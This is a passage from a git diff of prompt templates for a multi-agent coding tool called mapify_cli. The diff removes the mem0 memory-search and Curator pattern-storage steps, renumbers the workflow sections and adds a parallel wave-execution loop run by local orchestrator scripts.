] MCP Tools: Searched mem0 with mcp__mem0__map_tiered_search? Sequential-thinking for complex? +- [ ] MCP Tools: Used sequential-thinking for complex cases? context7 for library issues? - [ ] JSON: All fields? No markdown blocks? - [ ] Length: reasoning≥200, root_cause≥150, key_insight≥50? - [ ] Code: 5+ lines showing incorrect + correct? 
@@ -842,8 +786,7 @@ Before outputting: - [ ] Bullet Quality: 100+ chars? Code for impl/sec/perf? - [ ] Technology: {{language}}/{{framework}} syntax? - [ ] References: Specific lines/functions from actor_code? -- [ ] Deduplication: Checked all mem0 tiers before suggesting new bullets? -- [ ] Tier Context: Noted which tier existing patterns came from? +- [ ] Deduplication: Checked for existing similar patterns before suggesting new bullets? - [ ] Bullet Tags: Only bullets Actor used with evidence? diff --git a/src/mapify_cli/templates/agents/research-agent.md b/src/mapify_cli/templates/agents/research-agent.md index 7322923..bc942c9 100644 --- a/src/mapify_cli/templates/agents/research-agent.md +++ b/src/mapify_cli/templates/agents/research-agent.md @@ -276,24 +276,3 @@ Read( {{/if}} - - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**Relevant patterns from mem0:** - -{{existing_patterns}} - -**Usage**: Reference these patterns in your search to find similar implementations. - -{{/if}} - -{{#unless existing_patterns}} -*No mem0 patterns available. Search results will help seed the knowledge base.* -{{/unless}} - - diff --git a/src/mapify_cli/templates/agents/task-decomposer.md b/src/mapify_cli/templates/agents/task-decomposer.md index a6e43fd..6b0bf45 100644 --- a/src/mapify_cli/templates/agents/task-decomposer.md +++ b/src/mapify_cli/templates/agents/task-decomposer.md @@ -33,7 +33,6 @@ machine-readable blueprint for the Actor/Monitor pipeline. │ └─ Derive category: 1-4=low, 5-6=medium, 7-10=high │ │ │ │ 3. GATHER CONTEXT (if complexity ≥ 3) │ -│ └─ ALWAYS: mcp__mem0__map_tiered_search (historical decompositions) │ │ └─ IF ambiguous: sequentialthinking │ │ └─ IF external lib: get-library-docs │ │ └─ Handle fallbacks if tools fail/return empty │ @@ -85,43 +84,19 @@ machine-readable blueprint for the Actor/Monitor pipeline. 
| Condition | Tool | Query Pattern | |-----------|------|---------------| -| **ALWAYS** (complexity ≥ 3) | mcp__mem0__map_tiered_search | `"feature implementation [type]"`, `"task decomposition [domain]"` | | Ambiguous/complex goal | sequentialthinking | Iterative refinement of scope and dependencies | | External library | get-library-docs | Setup/quickstart guides for initialization order | | Unfamiliar domain | deepwiki | `"How does [repo] structure [feature]?"` | **Skip MCP when**: complexity_score ≤ 2, trivial change, clear internal pattern exists -### Re-rank Retrieved Patterns - -After mcp__mem0__map_tiered_search, re-rank results by relevance to current decomposition: - -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.feature_type matches goal_type: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.success_rate > 0.8: relevance_score += 2 - IF pattern.subtask_count in [5..8]: relevance_score += 1 # optimal range - IF pattern.created_at > (now - 60_days): relevance_score += 1 - -SORT by relevance_score DESC -USE top 2 patterns as decomposition reference -DOCUMENT: "Referenced patterns: [IDs] with relevance scores [X, Y]" -``` - ### MCP Fallback Procedures ``` -IF mcp__mem0__map_tiered_search returns NO results: - → Document "No historical precedent" in assumptions - → Add +1 to Risk factor for affected subtask (e.g., Risk: +0 → +1) - → Add research subtask if total complexity >= 5 - IF MCP tool FAILS (timeout/unavailable): → Document in open_questions → Add +1 to Risk factor for ALL subtasks (uncertainty penalty) - → Add "Decomposition lacks historical validation" to risks + → Add "Decomposition lacks tool validation" to risks Note: Uncertainty adjustments modify the Risk factor in the formula, applied BEFORE the cap at 10. 
Example: Base(1)+Novelty(+1)+Deps(+1)+Scope(+2)+Risk(+0→+1 uncertainty)=6 @@ -498,7 +473,6 @@ When invoked with `mode: "re_decomposition"` from the orchestrator, you receive ## Before Submitting Decomposition **Analysis Completeness**: -- [ ] Ran mcp__mem0__map_tiered_search for similar features - [ ] Used sequential-thinking for complex/ambiguous goals - [ ] Checked library docs for initialization requirements - [ ] Identified all risks (not empty for medium/high complexity) @@ -570,9 +544,8 @@ If circular dependency detected (e.g., A→B→C→A): - [ ] Open questions flagged that need clarification before proceeding **MCP Tool Usage Verification**: -- [ ] Did you call mcp__mem0__map_tiered_search FIRST? (mandatory for non-trivial goals) - [ ] Did you use insights from MCP tools in your decomposition? -- [ ] If no historical context found, documented "No relevant history found" in analysis +- [ ] If MCP tools unavailable, documented limitations in analysis @@ -593,16 +566,6 @@ If circular dependency detected (e.g., A→B→C→A): **Subtask Context** (if refining existing decomposition): {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -The following patterns have been learned from previous successful implementations: - -{{existing_patterns}} - -**Instructions**: Use these patterns to inform your task decomposition strategy and identify proven implementation approaches. -{{/if}} - {{#if feedback}} ## Previous Decomposition Feedback @@ -724,7 +687,7 @@ Omit for simple CRUD, internal helpers, obvious logic. 
## Decomposition Process (5 Phases) **Phase 1: Understand** → Scope, boundaries, complexity estimate -**Phase 2: Context** → mcp__mem0__map_tiered_search, library docs, existing patterns +**Phase 2: Context** → Library docs, existing patterns, sequential thinking **Phase 3: Atomize** → Break into independently implementable+testable units **Phase 4: Dependencies** → Map prerequisites, order by foundation→dependent→parallel **Phase 5: Validate** → Testable criteria, realistic scores, no placeholders diff --git a/src/mapify_cli/templates/commands/map-debate.md b/src/mapify_cli/templates/commands/map-debate.md index b1db61e..acb5301 100644 --- a/src/mapify_cli/templates/commands/map-debate.md +++ b/src/mapify_cli/templates/commands/map-debate.md @@ -9,7 +9,7 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth 1. Execute steps in order without pausing; only ask user if (a) `task-decomposer` returns blocking `analysis.open_questions` with no subtasks OR (b) Monitor sets `escalation_required === true` 2. Use exact `subagent_type` specified — never substitute `general-purpose` 3. Call each agent individually — no combining or skipping steps -4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7) +4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7 Retry Loop) 5. **ALWAYS generate 3 variants** — no conditional check (unlike map-efficient Self-MoA) 6. Use **debate-arbiter with model=opus** for synthesis @@ -20,15 +20,14 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth ``` 1. DECOMPOSE → task-decomposer 2. FOR each subtask: - a. CONTEXT → mem0 tiered search (`mcp__mem0__map_tiered_search`) - b. RESEARCH → if existing code understanding needed - c. 3 Actors (parallel) → security/performance/simplicity focuses - d. 3 Monitors (parallel) → validate + extract decisions - e. 
debate-arbiter (opus) → cross-evaluate + synthesize - f. Final Monitor → validate synthesis - g. If invalid: retry with feedback (max 5) - h. If risk_level ∈ {high, medium}: → Predictor - i. Apply changes + a. RESEARCH → if existing code understanding needed + b. 3 Actors (parallel) → security/performance/simplicity focuses + c. 3 Monitors (parallel) → validate + extract decisions + d. debate-arbiter (opus) → cross-evaluate + synthesize + e. Final Monitor → validate synthesis + f. If invalid: retry with feedback (max 5) + g. If risk_level ∈ {high, medium}: → Predictor + h. Apply changes 3. SUMMARY → optionally suggest /map-learn ``` @@ -87,32 +86,7 @@ Before calling any agents for the subtask, build a single **AI Packet** with uni Pass this packet verbatim to Actor/Monitor/debate-arbiter/Predictor. Do NOT rename tags mid-flow. -### 2.1 Get Context + Re-rank - -```bash -# Patterns from mem0 (tiered: branch → project → org) -mcp__mem0__map_tiered_search(query="[subtask description]", limit=5) - -# Optional: broader conceptual lookup -mcp__mem0__map_tiered_search(query="[concept]", limit=5) -``` - -**Re-rank retrieved patterns** by relevance to current subtask: - -``` -FOR each pattern in retrieved_patterns: - relevance_score = evaluate: - - Domain match: Does pattern's domain match subtask? (+2) - - Technology overlap: Same language/framework? (+1) - - Recency: Created within 30 days? (+1) - - Success indicator: Marked validated/production? (+1) - - Complexity alignment: Similar complexity_score? (+1) - - SORT patterns by relevance_score DESC - PASS top 3 patterns to Actor as "context_patterns" -``` - -### 2.2 Research (Conditional) +### 2.1 Research (Conditional) **Call if:** refactoring, bug fixes, extending existing code, touching 3+ files **Skip for:** new standalone features, docs, config @@ -131,7 +105,7 @@ Max tokens: 1500" Pass `executive_summary` to Actor if `confidence >= 0.7`. 
-### 2.3 Quality-Stakes Assessment +### 2.2 Quality-Stakes Assessment **Purpose:** Determine deployment context and set minimum quality thresholds before launching Actor variants. @@ -161,7 +135,7 @@ quality_context = { **Rationale:** Prevents quality erosion in debate by establishing non-negotiable baselines before variants propose solutions. -### 2.4 Parallel Actors (3 Variants) +### 2.3 Parallel Actors (3 Variants) **ALWAYS call 3 Actors in parallel with different focuses:** @@ -172,7 +146,6 @@ Task( description="Implement subtask [ID] - Security (v1)", prompt="Implement with SECURITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of security focus. approach_focus: security, variant_id: v1, self_moa_mode: true @@ -185,7 +158,6 @@ Task( description="Implement subtask [ID] - Performance (v2)", prompt="Implement with PERFORMANCE focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of performance focus. approach_focus: performance, variant_id: v2, self_moa_mode: true @@ -198,7 +170,6 @@ Task( description="Implement subtask [ID] - Simplicity (v3)", prompt="Implement with SIMPLICITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of simplicity focus. 
approach_focus: simplicity, variant_id: v3, self_moa_mode: true @@ -206,7 +177,7 @@ Follow the Actor agent protocol output format. Ensure `decisions_made` is includ ) ``` -### 2.5 Parallel Monitors (3 Validations) +### 2.4 Parallel Monitors (3 Validations) Validate each variant in parallel: @@ -229,7 +200,7 @@ If a SpecificationContract is provided: include `spec_contract_compliant` + `spe Repeat for v2 and v3 in parallel. -### 2.6 debate-arbiter (Opus) +### 2.5 debate-arbiter (Opus) ``` Task( @@ -268,7 +239,7 @@ Include: comparison_matrix, decision_rationales, synthesis_reasoning (8 steps)." ) ``` -### 2.7 Final Monitor +### 2.6 Final Monitor Validate synthesized code: @@ -286,7 +257,7 @@ Return ONLY valid JSON following MonitorReviewOutput schema." ) ``` -### 2.8 Retry Loop +### 2.7 Retry Loop If Final Monitor returns `valid === false`: 1. Provide feedback including arbiter's synthesis_reasoning @@ -302,7 +273,7 @@ retry_context = { } ``` -### 2.9 Escalation Gate (AskUserQuestion) +### 2.8 Escalation Gate (AskUserQuestion) If Monitor returns `escalation_required === true`, ask user: @@ -321,7 +292,7 @@ AskUserQuestion(questions=[ ]) ``` -### 2.10 Conditional Predictor +### 2.9 Conditional Predictor ```python # Enhanced predictor decision: @@ -392,11 +363,11 @@ else: ) ``` -### 2.11 Apply Changes +### 2.10 Apply Changes Apply synthesized code via Write/Edit tools. Proceed to next subtask. -### 2.12 Gate 2: Tests Available / Run +### 2.11 Gate 2: Tests Available / Run After applying changes, run tests if available. @@ -408,7 +379,7 @@ After applying changes, run tests if available. If no tests found: mark gate as skipped and proceed. -### 2.13 Gate 3: Formatter / Linter +### 2.12 Gate 3: Formatter / Linter After tests gate, run formatter/linter checks if available. 
diff --git a/src/mapify_cli/templates/commands/map-debug.md b/src/mapify_cli/templates/commands/map-debug.md index 8e2cf6b..6bdd2a3 100644 --- a/src/mapify_cli/templates/commands/map-debug.md +++ b/src/mapify_cli/templates/commands/map-debug.md @@ -40,12 +40,7 @@ Debugging workflow focuses on analysis before implementation: ## Step 1: Analyze the Issue -Before calling task-decomposer, gather context and search mem0: - -```bash -# Search for similar debugging patterns -PATTERN_CONTEXT=$(mcp__mem0__map_tiered_search(query="debug [issue type]", section_filter="DEBUGGING_TECHNIQUES", limit=5)) -``` +Before calling task-decomposer, gather context: 1. **Read error logs/stack traces** (if provided in $ARGUMENTS) 2. **Identify affected files**: Use Grep/Glob to find relevant code @@ -64,7 +59,6 @@ Task( **Context:** - Error logs: [if available] - Affected files: [from analysis] -- Similar past issues: [from mem0 search] Output JSON with: - subtasks: array of {id, description, debug_type: 'investigation'|'fix'|'verification', acceptance_criteria} @@ -240,7 +234,6 @@ This is **completely optional**. 
Run it when debugging patterns are valuable for ## MCP Tools for Debugging -- `mcp__mem0__map_tiered_search` - Find similar past debugging sessions - `mcp__sequential-thinking__sequentialthinking` - Complex root cause analysis - `mcp__context7__get-library-docs` - Check library documentation for known issues - `mcp__deepwiki__ask_question` - Learn from how others solved similar issues diff --git a/src/mapify_cli/templates/commands/map-efficient.md b/src/mapify_cli/templates/commands/map-efficient.md index b91c5f3..658e473 100644 --- a/src/mapify_cli/templates/commands/map-efficient.md +++ b/src/mapify_cli/templates/commands/map-efficient.md @@ -24,7 +24,6 @@ State machine enforces sequencing, Python validates completion, hooks inject rem /map-efficient does NOT use these agents (by design): - **Evaluator** — quality scoring not needed; Monitor validates correctness directly - **Reflector** — lesson extraction is a separate step via `/map-learn` -- **Curator** — pattern storage is a separate step via `/map-learn` This is NOT a violation of MAP agent rules. Learning is decoupled into `/map-learn` (optional, run after workflow completes) to reduce token usage during execution. @@ -48,7 +47,7 @@ Both files must stay in sync. The orchestrator updates `step_state.json` on ever │ map-efficient.md (THIS FILE - ~540 lines) │ │ 1. Load state → Get next step instruction │ │ 2. Route to appropriate executor based on step phase │ -│ 3. Execute step (Actor/Monitor/mem0/tests/etc) │ +│ 3. Execute step (Actor/Monitor/tests/etc) │ │ 4. Validate completion → Update state │ │ 5. If more steps → Recurse; Else → Complete │ └─────────────────────────────────────────────────────────────┘ @@ -129,9 +128,11 @@ This eliminates reasoning overhead — the contract IS the specification.""" ) # After decomposer returns: -# 1. Extract subtask IDs from blueprint and register them in state: +# 1. 
Save the full blueprint JSON for wave computation:
+# Write the decomposer output to .map/${BRANCH}/blueprint.json
+# 2. Extract subtask IDs from blueprint and register them in state:
 # python3 .map/scripts/map_orchestrator.py set_subtasks ST-001 ST-002 ST-003
-# 2. Validate step completion:
+# 3. Validate step completion:
 # python3 .map/scripts/map_orchestrator.py validate_step "1.0"
 ```
 
@@ -221,6 +222,76 @@ Then use the **Write** tool to create `.map//workflow_state.json`:
 }
 ```
 
+### Wave Computation (after INIT_STATE)
+
+After INIT_STATE (1.6) completes, compute execution waves from the dependency DAG:
+
+```bash
+python3 .map/scripts/map_orchestrator.py set_waves --blueprint .map/${BRANCH}/blueprint.json
+```
+
+This reads the blueprint, builds a dependency graph, computes topological waves,
+and splits waves by file conflicts. The result is stored in `step_state.json`.
+
+**Wave execution**: If waves are computed, subtasks within a wave run their Actor
+and Monitor phases in parallel. Check wave status with:
+
+```bash
+WAVE=$(python3 .map/scripts/map_orchestrator.py get_wave_step)
+MODE=$(echo "$WAVE" | jq -r '.mode')
+```
+
+If `mode` is `"parallel"`, launch all actors in the wave in ONE message using
+multiple `Task()` calls, then all monitors in ONE message. If `mode` is
+`"sequential"`, use the standard single-subtask loop below.
+ +**Parallel wave execution loop**: + +``` +loop: + WAVE = get_wave_step() + if WAVE.is_complete: goto final_verification + + if WAVE.mode == "sequential": + # Single subtask — same as standard behavior below + execute_current_sequential_loop() + else: + # === PARALLEL WAVE === + # Phase A: Prep (sequential per subtask - lightweight) + for each subtask in WAVE.subtasks: + build XML_PACKET, run CONTEXT_SEARCH, optional RESEARCH + + # Phase B: Parallel Actors + # Launch ALL Task(subagent_type="actor") calls in ONE message + # Example: Task(actor, "Implement ST-002") + Task(actor, "Implement ST-004") + + # Phase C: Parallel Monitors + # After all actors return, launch ALL monitors in ONE message + # Example: Task(monitor, "Validate ST-002") + Task(monitor, "Validate ST-004") + + # Phase D: Retry handling + # For each monitor that returned valid=false: + # Re-run actor + monitor for that subtask (serially) + # Track retries per subtask: validate_wave_step SUBTASK_ID STEP_ID + + # Phase E: Per-wave gates + # Run tests + linter ONCE for the entire wave + # pytest / npm test / etc. + + # Phase F: Advance wave + python3 .map/scripts/map_orchestrator.py advance_wave + + # Update workflow state for all subtasks in batch: + python3 .map/scripts/map_step_runner.py update_workflow_state_batch '[ + {"subtask_id": "ST-002", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-002", "step_name": "monitor", "new_state": "MONITOR_PASSED"}, + {"subtask_id": "ST-004", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-004", "step_name": "monitor", "new_state": "MONITOR_PASSED"} + ]' +``` + +Linear DAGs naturally degrade to single-subtask waves (identical to current behavior). 
+ ### Phase: XML_PACKET (2.0) ```python @@ -235,20 +306,6 @@ xml_packet = create_xml_packet(subtask) # Packet boundaries are unambiguous — agents parse by tag, not by heuristics ``` -### Phase: MEM0_SEARCH (2.1) - -```bash -# Tiered search: branch → project → org -mcp__mem0__map_tiered_search( - query="[subtask description]", - limit=5, - user_id="org:[org_name]", - run_id="proj:[project_name]:branch:[branch_name]" -) - -# Re-rank by relevance, pass top 3 to Actor -``` - ### Phase: RESEARCH (2.2) ```python @@ -283,10 +340,6 @@ Task( [paste from .map//current_packet.xml] - -[top context_patterns from mem0 + relevance_score] - - [AAG contract from decomposition: Actor -> Action -> Goal] @@ -466,7 +519,6 @@ Answer: [YES/NO - if NO, explain why not] Question 2: For EACH subtask, did I: - Create XML packet? [YES/NO per subtask] - - Call mem0 search? [YES/NO per subtask] - Call research-agent if 3+ files? [YES/NO/N/A per subtask] - Call Actor agent? [YES/NO per subtask] - Call Monitor agent after Actor? [YES/NO per subtask] @@ -521,7 +573,7 @@ if [ "$IS_COMPLETE" = "true" ]; then # Go to Step 3 else # CONTEXT DISTILLATION before recurse: - # Do NOT pass full RESEARCH logs, mem0 results, or Actor/Monitor transcripts. + # Do NOT pass full RESEARCH logs or Actor/Monitor transcripts. # Pass ONLY the distilled state to keep new context in SFT comfort zone (~4k tokens): # # 1. findings.md — distilled research output (not raw search logs) diff --git a/src/mapify_cli/templates/commands/map-fast.md b/src/mapify_cli/templates/commands/map-fast.md index ed16ee7..be195f3 100644 --- a/src/mapify_cli/templates/commands/map-fast.md +++ b/src/mapify_cli/templates/commands/map-fast.md @@ -6,9 +6,9 @@ description: Minimal workflow for small, low-risk changes (40-50% savings, NO le **⚠️ WARNING: Use for small, low-risk production changes only. Do not skip tests.** -Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector, Curator. 
+Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector. -**Consequences:** No impact analysis, no quality scoring, no learning, knowledge base never improves. +**Consequences:** No impact analysis, no quality scoring, no learning. Implement the following: @@ -30,7 +30,6 @@ Minimal agent sequence (token-optimized, reduced analysis depth): **Agents INTENTIONALLY SKIPPED:** - Predictor (no impact analysis) - Reflector (no lesson extraction) -- Curator (no mem0 pattern updates) **⚠️ CRITICAL:** This is NOT the full MAP workflow. Learning and impact analysis are disabled. @@ -122,12 +121,12 @@ After all subtasks completed: 2. Create commit with message 3. Summarize what was implemented -**Note:** No mem0 pattern updates (learning disabled). +**Note:** Learning disabled (Reflector skipped). ## Critical Constraints - MAX 3 iterations per subtask -- NO learning cycle (Reflector/Curator skipped) +- NO learning cycle (Reflector skipped) - NO impact analysis (Predictor skipped) - NO quality scoring diff --git a/src/mapify_cli/templates/commands/map-learn.md b/src/mapify_cli/templates/commands/map-learn.md index 5e53b41..69521c7 100644 --- a/src/mapify_cli/templates/commands/map-learn.md +++ b/src/mapify_cli/templates/commands/map-learn.md @@ -4,7 +4,7 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea # MAP Learn - Post-Workflow Learning -**Purpose:** Standalone command to extract and preserve lessons AFTER completing any MAP workflow. +**Purpose:** Standalone command to extract lessons AFTER completing any MAP workflow. **When to use:** - After `/map-efficient` completes (to preserve patterns from the workflow) @@ -13,24 +13,18 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea **What it does:** 1. Calls Reflector agent to analyze workflow outputs and extract patterns -2. Calls Curator agent to store patterns directly via mem0 MCP tools -3. 
Verifies patterns stored via `mcp__mem0__map_tiered_search` - -**Storage Architecture:** -- Branch tier: `run_id="proj:PROJECT:branch:BRANCH"` (branch-scoped patterns) -- Project tier: `run_id="proj:PROJECT"` (shared across branches) -- Org tier: `user_id="org:ORG"` only (shared across all projects) +2. Outputs a structured learning summary for the user to review **Workflow Summary Input:** $ARGUMENTS --- -## ⚠️ IMPORTANT: This is an OPTIONAL step +## IMPORTANT: This is an OPTIONAL step -**You are NOT required to run this command.** No MAP workflow includes automatic learning — learning is always a separate step via this command. +**You are NOT required to run this command.** No MAP workflow includes automatic learning -- learning is always a separate step via this command. Use /map-learn when: -- You completed /map-efficient, /map-debug, or /map-fast and want to preserve lessons +- You completed /map-efficient, /map-debug, or /map-fast and want to extract lessons - You want to batch-learn from multiple workflows at once - You want to manually trigger learning for custom workflows @@ -56,7 +50,7 @@ Check that $ARGUMENTS contains workflow summary: Workflow: /map-efficient "Add user authentication" Subtasks completed: 3 Files changed: api/auth.py, models/user.py, tests/test_auth.py -Iterations: 5 total (Actor→Monitor loops) +Iterations: 5 total (Actor->Monitor loops) Subtask 1 (Actor output): [paste Actor JSON output] @@ -73,7 +67,7 @@ Subtask 1 (Monitor result): ## Step 2: Reflector Analysis -**⚠️ MUST use subagent_type="reflector"** (NOT general-purpose): +**MUST use subagent_type="reflector"** (NOT general-purpose): ``` Task( @@ -84,15 +78,6 @@ Task( **Workflow Summary:** $ARGUMENTS -**MANDATORY FIRST STEP:** -1. Call mcp__mem0__map_tiered_search to check if similar patterns already exist across tiers -2. Only suggest new bullets if pattern is genuinely novel (not found in any tier) -3. 
Reference existing patterns with their tier context in your analysis - -**Tier Search Parameters:** -- user_id: 'org:ORG_NAME' (for org-level context) -- run_id: 'proj:PROJECT_NAME:branch:BRANCH_NAME' (for branch context with inheritance) - **Analysis Instructions:** Analyze holistically across ALL subtasks: @@ -111,106 +96,17 @@ Analyze holistically across ALL subtasks: **Output JSON with:** - key_insight: string (one sentence takeaway for entire workflow) -- patterns_used: array of strings (existing patterns applied successfully, with tier labels) +- patterns_used: array of strings (existing patterns applied successfully) - patterns_discovered: array of strings (new patterns worth preserving) - bullet_updates: array of {bullet_id, tag: 'helpful'|'harmful', reason} - suggested_new_bullets: array of {section, content, code_example, rationale} -- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings} -- mem0_duplicates_found: array of {pattern, tier, memory_id} (from tiered search results)" +- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings}" ) ``` -**Verification:** Check Reflector output contains evidence of `mcp__mem0__map_tiered_search` call: -- Should show: "mem0 tiered search found existing patterns in [tier]..." -- Or: "No similar patterns found in any tier. This appears to be a novel pattern." - -**If tiered search was NOT called:** Reflector did not follow instructions. Flag this as critical issue. - --- -## Step 3: Curator Storage - -**⚠️ MUST use subagent_type="curator"** (NOT general-purpose): - -``` -Task( - subagent_type="curator", - description="Store workflow learnings via mem0 MCP tools", - prompt="Store Reflector insights using mem0 MCP tools directly: - -**Reflector Insights:** -[paste Reflector JSON output from Step 2] - -**MANDATORY: Curator now calls mem0 MCP tools directly (NO JSON delta output)** - -**Curator will:** -1. 
Call mcp__mem0__map_tiered_search to verify no duplicates exist -2. Call mcp__mem0__map_add_pattern for each new pattern -3. Call mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 - -**Tier Selection:** -- Branch tier: run_id='proj:PROJECT:branch:BRANCH' (for unvalidated patterns) -- Project tier: run_id='proj:PROJECT' (for proven patterns) -- Org tier: user_id='org:ORG' only (for cross-project patterns) - -**Deduplication via Fingerprinting:** -- Each pattern has SHA256 fingerprint of normalized content -- mcp__mem0__map_add_pattern returns {created: false} if duplicate exists -- Reference existing pattern ID instead of creating duplicate - -**Promotion Criteria:** -- helpful_count >= 3: Eligible for promotion to higher tier -- helpful_count >= 5: Auto-promote to project tier -- helpful_count >= 10 with cross-project usage: Promote to org tier" -) -``` - -**Verification:** Curator will: -- Show tool calls to `mcp__mem0__map_tiered_search` for deduplication -- Show tool calls to `mcp__mem0__map_add_pattern` for new patterns -- Report patterns stored with their tier and memory_id - -**If Curator outputs JSON instead of calling tools:** Curator did not follow updated instructions. Flag this as critical issue. - ---- - -## Step 4: Verify Storage - -Verify patterns were stored correctly using mem0 tiered search: - -``` -mcp__mem0__map_tiered_search( - query="[pattern content from Reflector]", - user_id="org:ORG_NAME", - run_id="proj:PROJECT:branch:BRANCH", - include_archived=false -) -``` - -**Expected output:** -```json -{ - "results": [ - { - "memory_id": "mem-abc123", - "text": "Pattern content...", - "tier": "branch", - "metadata": { - "section_id": "IMPLEMENTATION_PATTERNS", - "helpful_count": 1, - "created_at": "2025-01-12T..." - } - } - ], - "total": 1 -} -``` - -**If patterns not found:** Check Curator tool call outputs for errors. Retry storage if needed. 
- ---- - -## Step 5: Summary Report +## Step 3: Summary Report Provide learning summary: @@ -219,114 +115,40 @@ Provide learning summary: **Workflow Analyzed:** [workflow type from input] **Total Subtasks:** [N] -**Iterations Required:** [total Actor→Monitor loops] +**Iterations Required:** [total Actor->Monitor loops] ### Reflector Insights - **Key Insight:** [key_insight from Reflector] -- **Patterns Used:** [count] existing patterns applied successfully (with tier labels) +- **Patterns Used:** [count] existing patterns applied successfully - **Patterns Discovered:** [count] new patterns identified -- **mem0 Duplicates Found:** [count] (avoided duplication via fingerprint) -### Curator Storage Results -- **Stored:** [N] new patterns via mcp__mem0__map_add_pattern -- **Skipped (duplicates):** [N] patterns already exist -- **Promoted:** [N] patterns to higher tiers +### Discovered Patterns +[List each pattern from patterns_discovered with description] -### Tier Distribution -- **Branch tier:** [N] patterns (run_id=proj:PROJECT:branch:BRANCH) -- **Project tier:** [N] patterns (run_id=proj:PROJECT) -- **Org tier:** [N] patterns (user_id=org:ORG only) +### Suggested Improvements +[List each suggested_new_bullet with section and rationale] -### Next Steps -- Review new patterns: `mcp__mem0__map_tiered_search(query="[pattern]", ...)` -- Validate in next workflow: Apply patterns and increment helpful_count if successful -- Promote proven patterns: Use mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 +### Workflow Efficiency +- **Total Iterations:** [total_iterations] +- **Average per Subtask:** [avg_per_subtask] +- **Bottlenecks:** [list bottlenecks] -**Learning cycle complete. Patterns stored in mem0.** +**Learning extraction complete.** ``` --- -## Troubleshooting - -### Issue: Reflector didn't call mcp__mem0__map_tiered_search - -**Symptom:** Reflector output has no mention of "mem0 tiered search found" or tier labels. 
- -**Cause:** Reflector agent template not followed. - -**Fix:** -1. Re-run Reflector with explicit instruction: "FIRST STEP: Call mcp__mem0__map_tiered_search" -2. Verify output shows search results with tier labels -3. Proceed to Curator only after verification - -### Issue: Curator output JSON instead of calling tools - -**Symptom:** Curator returns JSON delta operations instead of calling mem0 MCP tools directly. - -**Cause:** Curator using outdated workflow (pre-mem0 migration). - -**Fix:** -1. Ensure Curator agent template is version 4.0.0+ -2. Re-run Curator with explicit instruction: "Call mem0 MCP tools directly, DO NOT output JSON" -3. Verify Curator shows mcp__mem0__map_add_pattern calls in output - -### Issue: mcp__mem0__map_add_pattern returns duplicate error - -**Symptom:** `{created: false, existing_memory_id: "..."}` returned. - -**Cause:** Pattern with same fingerprint already exists. - -**This is expected behavior!** Fingerprint-based deduplication working correctly. - -**Action:** -1. Reference the existing memory_id instead of creating new -2. If pattern needs update, use mcp__mem0__update_memory -3. If pattern should be promoted, use mcp__mem0__map_promote_pattern - -### Issue: mem0 MCP server unavailable - -**Symptom:** Tool calls fail with connection error. - -**Cause:** mem0-mcp server not running or misconfigured. - -**Fix:** -1. Check mem0-mcp server status -2. Verify MCP configuration in Claude Code settings -3. Restart mem0-mcp server if needed -4. If persistent failure: Document patterns manually, retry later - -### Issue: Patterns stored in wrong tier - -**Symptom:** Branch-specific patterns stored at org level, or vice versa. - -**Cause:** Incorrect namespace parameters to mcp__mem0__map_add_pattern. - -**Fix:** -1. Verify namespace format: - - Branch: `run_id="proj:PROJECT:branch:BRANCH"` + `user_id="org:ORG"` - - Project: `run_id="proj:PROJECT"` + `user_id="org:ORG"` - - Org: `user_id="org:ORG"` only (no run_id) -2. 
Use mcp__mem0__map_promote_pattern to move to correct tier -3. Archive incorrectly placed pattern with mcp__mem0__map_archive_pattern - ---- - ## Token Budget Estimate **Typical /map-learn execution:** - Reflector: ~3K tokens (depends on workflow size) -- Curator: ~2K tokens (direct tool calls, no JSON processing) -- Verification: ~500 tokens (tiered search) -- **Total:** 5-6K tokens for standard workflow +- Summary: ~500 tokens +- **Total:** 3-4K tokens for standard workflow **Large workflow (8+ subtasks):** - Reflector: ~6K tokens -- Curator: ~4K tokens (multiple pattern storage calls) -- Verification: ~1K tokens -- **Total:** 10-12K tokens - -**Compared to per-subtask learning:** /map-learn saves ~(N-1) * 5K tokens for N subtasks. +- Summary: ~1K tokens +- **Total:** 6-7K tokens --- @@ -351,30 +173,10 @@ Key implementation: ``` Reflector extracts: -- mem0 tiered search found no similar patterns in any tier - Pattern: WebSocket reconnection logic - Pattern: Optimistic UI updates -Curator stores via mem0 MCP tools: -``` -mcp__mem0__map_add_pattern( - text="WebSocket exponential backoff: Start with 1s delay, double on each retry (max 30s)...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "IMPLEMENTATION_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-abc123", tier: "branch"} - -mcp__mem0__map_add_pattern( - text="Optimistic UI: Update local state immediately, revert on server error...", - user_id="org:myorg", - 